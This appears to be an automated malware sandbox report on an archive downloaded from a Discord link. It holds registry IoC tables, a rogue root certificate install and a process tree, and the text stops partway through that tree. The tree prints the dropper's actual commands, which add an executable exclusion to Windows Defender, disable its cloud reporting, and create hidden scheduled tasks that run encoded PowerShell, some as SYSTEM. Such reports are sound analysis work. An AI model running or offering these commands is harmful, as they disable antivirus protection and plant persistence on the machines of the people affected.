Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	d83frV2Rj9Wa_Wazpbh4_p98.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
3504	EL2Valb7nJ1aCGWwenVPdrf8.exe
3504	EL2Valb7nJ1aCGWwenVPdrf8.exe
5520	zsEf6XWGGxzRmnVTKexLrc_e.exe
5520	zsEf6XWGGxzRmnVTKexLrc_e.exe
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
5704	_sMdS5SXAFvQf2QncmxDg1wN.exe
5704	_sMdS5SXAFvQf2QncmxDg1wN.exe
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2740	7zFM.exe
3444	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3504	EL2Valb7nJ1aCGWwenVPdrf8.exe
2216	cctbhgt

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
2740	7zFM.exe
2740	7zFM.exe
1532	chrome.exe
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3444	Process not Found
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
3444	Process not Found
3444	Process not Found
3444	Process not Found
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe
5636	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3444	Process not Found

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3444	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1532 wrote to memory of 5008	1532	chrome.exe	87
PID 1532 wrote to memory of 5008	1532	chrome.exe	87
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 4436	1532	chrome.exe	89
PID 1532 wrote to memory of 60	1532	chrome.exe	90
PID 1532 wrote to memory of 60	1532	chrome.exe	90
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91
PID 1532 wrote to memory of 3684	1532	chrome.exe	91

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8c6ea728e2.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8c6ea728e2.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1220295157723959339/1220678970400440370/ver3_file.rar?ex=660fd0e1&is=65fd5be1&hm=6731be839531b1cd5f9780c50a856b5c05571fdd6ba89a55f3dacabdf7c1be84&
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc26dc9758,0x7ffc26dc9768,0x7ffc26dc9778
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:2
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:8
  2⤵
  PID:60
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2192 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:8
  2⤵
  PID:3684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3092 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:1
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5532 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:8
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:8
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1040 --field-trial-handle=1860,i,9790403824287749973,11710242945562520307,131072 /prefetch:8
  2⤵
  PID:4012
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\ver3_file.rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:2740
- - C:\Users\Admin\AppData\Local\Temp\7zO4BADCC68\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO4BADCC68\setup.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies registry class
    PID:5084
  - - C:\Users\Admin\Documents\GuardFox\8wYfsbzIhhMlVg7PGNu8B15u.exe
      "C:\Users\Admin\Documents\GuardFox\8wYfsbzIhhMlVg7PGNu8B15u.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Checks processor information in registry
      PID:3112
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 1380
        5⤵
        Program crash
        
        PID:5140
  - - C:\Users\Admin\Documents\GuardFox\fIQj5WEYwVW9koZrQrGg9EWZ.exe
      "C:\Users\Admin\Documents\GuardFox\fIQj5WEYwVW9koZrQrGg9EWZ.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      PID:2496
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        5⤵
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        
        PID:2272
  - - C:\Users\Admin\Documents\GuardFox\xxuJ1yyURX4tFm310L_gVLlB.exe
      "C:\Users\Admin\Documents\GuardFox\xxuJ1yyURX4tFm310L_gVLlB.exe"
      4⤵
      Executes dropped EXE
      PID:5100
    - - C:\Users\Admin\AppData\Local\Temp\7zSDB19.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:3764
      - C:\Users\Admin\AppData\Local\Temp\7zSE54A.tmp\Install.exe
        
        .\Install.exe /lnFdidcxmFq "525403" /S
        6⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:5436
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:5572
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:1600
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:3752
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:5360
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:5172
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gdHUxpBjF" /SC once /ST 08:24:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:5488
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gdHUxpBjF"
        7⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gdHUxpBjF"
        7⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bunLmsPgGqMrVCMrEs" /SC once /ST 16:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YfEflelvsosyxfuRn\VHPhyMJGvokurjb\foUkoPZ.exe\" ze /apsite_idZsr 525403 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4160
  - - C:\Users\Admin\Documents\GuardFox\4p8e02_zESQoARv4BD86syqL.exe
      "C:\Users\Admin\Documents\GuardFox\4p8e02_zESQoARv4BD86syqL.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4552
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5384
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 2128
        6⤵
        Program crash
        
        PID:752
  - - C:\Users\Admin\Documents\GuardFox\EL2Valb7nJ1aCGWwenVPdrf8.exe
      "C:\Users\Admin\Documents\GuardFox\EL2Valb7nJ1aCGWwenVPdrf8.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:3504
  - - C:\Users\Admin\Documents\GuardFox\zsEf6XWGGxzRmnVTKexLrc_e.exe
